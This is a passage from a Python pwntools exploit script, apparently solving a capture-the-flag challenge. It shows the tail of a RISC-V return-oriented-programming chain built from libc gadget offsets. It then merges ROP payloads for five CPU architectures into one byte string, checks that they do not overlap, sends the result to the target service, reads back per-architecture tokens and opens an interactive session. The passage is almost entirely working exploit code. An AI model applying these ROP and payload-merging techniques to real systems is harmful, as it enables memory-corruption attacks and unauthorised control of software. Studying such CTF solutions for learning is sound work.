0x58: riscv64_stdin_fd - 0x28, # s2, file descriptor address
# 0x60: 0, # s1
0x68: 42, # FP (s0), file descriptor
# ra # ld a5,40(s2); mv a0,s3; add a5,a5,s0; sd a5,40(s2)
0x70: riscv64_exe.sym['__fwritex'] + 0x8c,
# s0, start of function array
0x98: riscv64_rop_offset + riscv64_stack_base + riscv64_array_offset,
# s0, end of function array
0x90: riscv64_rop_offset + riscv64_stack_base + riscv64_array_offset + 0x10,
0xa0: riscv64_exe.sym['__libc_start_init'] + 0x24, # call function array
riscv64_array_offset: [
riscv64_exe.sym['getchar'],
riscv64_exe.sym['main'] + 0x7c, # puts ( s5 )
],
},
}, word_size=64, endian='little',filler=b'\0')
##########################
##### Merge Payloads #####
##########################
payloads = [
('arm', payload_arm),
('aarch64', payload_aarch64),
('riscv', payload_riscv),
('x86_64', payload_x86_64),
('s390x', payload_s390x),
]
def key(name_payload):
    return len(name_payload[1])
maxlen = key(max(payloads, key=key))
for (name, payload) in payloads:
    assert b'\n' not in payload, f'Payload for {name} has newlines!'
merged_payload = [0] * maxlen
for i in range(maxlen):
    candidates = {}
    for (name, payload) in payloads:
        if len(payload) > i and payload[i] != 0:
            candidates[name] = payload[i]
    if len(candidates) > 1:
        error(f'Payloads {list(candidates.keys())} overlap at 0x{i:x}!!!', ', '.join(candidates))
    elif len(candidates) == 1:
        merged_payload[i] = candidates.popitem()[1]
for (name, payload) in payloads:
    info(f'{name:10} ' + ''.join(['X' if payload[i:i+8] != bytes(8) else '_' for i in range(0, len(payload), 8)]))
merged_payload = bytes(merged_payload)
###################
##### Exploit #####
###################
r.sendline(b'1')
read_response(r)
r.sendline(bytes(merged_payload))
read_response(r)
r.sendline(b'2')
tokens_raw = read_response(r)
for arch, token in tokens_raw.items():
    success(f'Token for {arch}: {token}')
r.sendline(b'magic word')
for a in archs:
    r.sendline(tokens_raw[a][:16])
r.interactive()